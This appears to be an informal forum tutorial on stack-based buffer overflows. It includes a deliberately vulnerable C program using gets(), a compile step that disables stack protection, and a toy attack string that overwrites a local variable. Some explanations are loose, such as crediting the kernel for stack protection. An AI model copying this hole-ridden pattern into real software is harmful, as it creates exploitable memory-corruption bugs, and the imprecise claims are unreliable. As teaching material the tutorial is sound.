Stack is a Last in First out(LIFO) abstract data structure...Stack is used as the main data structure for processing and data management on most of the OS architectures...like intel x86 etc etc.. Stack based Overflows It happens when to much data is passed on the call stack and results in overwriting data... The call stack is limited amount of memory , of ten determined at the start of the program.. When program tries to access more space that is available to the call stack it basically results in a overflow... Why it is dangerous It is dangerous because the call stack contains all our data (decrations) included the one used for user Input.. eg :- if we declared Code: char pass[] = “I am the password!!!”; int i = 0; char userInput[10]; Then the stack would look like :- Code: ======= |userInput| ________ |int i = 0| ====== |char pass| Now if we overflowed the userInput then we will successful overflow the int I with our desired value..It will be clear when we see the exploit example.. Exploiting Exploit :- buggyProgram.c Code: #include<stdio.h> int main() { int i=0; char userInput[10]; printf("Please enter some data : "); gets(userInput); // depriciated function now you will get to know why we should not use this... if(i==0x31313131) { printf("You !!!! Just exploited me.. Aah! :( :'(\n"); } } Compiling :- We would be using gcc with the flag of no stack protector so that kernel does not stop us.. Code: aneesh@aneesh-laptop:~/articles/C$ gcc buggyProgram.c -fno-stack-protector -o buggyProgram /tmp/ccORWe40.o: In function `main': buggyProgram.c:(.text+0x26): warning: the `gets' function is dangerous and should not be used. aneesh@aneesh-laptop:~/articles/C$ Lets exploit it now.... Lets create a attact string first :- As we know the userInput is just 10 bytes long. Thus, in order to exploit this we would need to pass 10 bytes to this... and further with 4 1's to overwrite the int I variable... Attack string :- Code: [10 bytes garbage] + [4 * 1] | | for filling for overwriting up userInput the int variable Now lets pass this to the program and see what happens.. Code: aneesh@aneesh-laptop:~/articles/C$ ./buggyProgram Please enter some data : AAAAAAAAAA1111 You !!!! Just exploited me.. Aah! :( :'( And BooM!! We did it!!!